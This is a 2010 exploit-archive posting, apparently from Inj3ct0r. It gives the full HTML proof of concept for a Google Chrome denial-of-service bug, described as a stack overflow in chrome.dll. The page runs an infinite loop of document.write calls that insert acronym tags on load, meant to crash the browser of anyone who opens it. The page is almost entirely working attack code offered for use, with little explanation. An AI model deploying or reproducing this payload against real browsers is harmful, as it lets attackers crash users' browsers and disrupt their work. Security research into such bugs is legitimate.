Home / os / win7

Google Chrome acronym tag denial of service exploit

Posted on 30 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Google Chrome acronym tag denial of service exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================== Google Chrome acronym tag denial of service exploit =================================================== &lt;html&gt; &lt;title&gt;Google Chrome remote stack overflow in chrome.dll; published at http://h.ackack.net; found by: Jelmer de Hen&lt;/title&gt; &lt;head&gt; &lt;script&gt; // Open it a couple of times, it might not always work; see http://h.ackack.net/?p=323 for more information function pataboom(){ while(1){ document.write(&quot;&lt;acronym&gt;&quot;); } } &lt;/script&gt; &lt;/head&gt; &lt;body onload=&quot;pataboom();&quot;&gt;&lt;/body&gt; &lt;/html&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP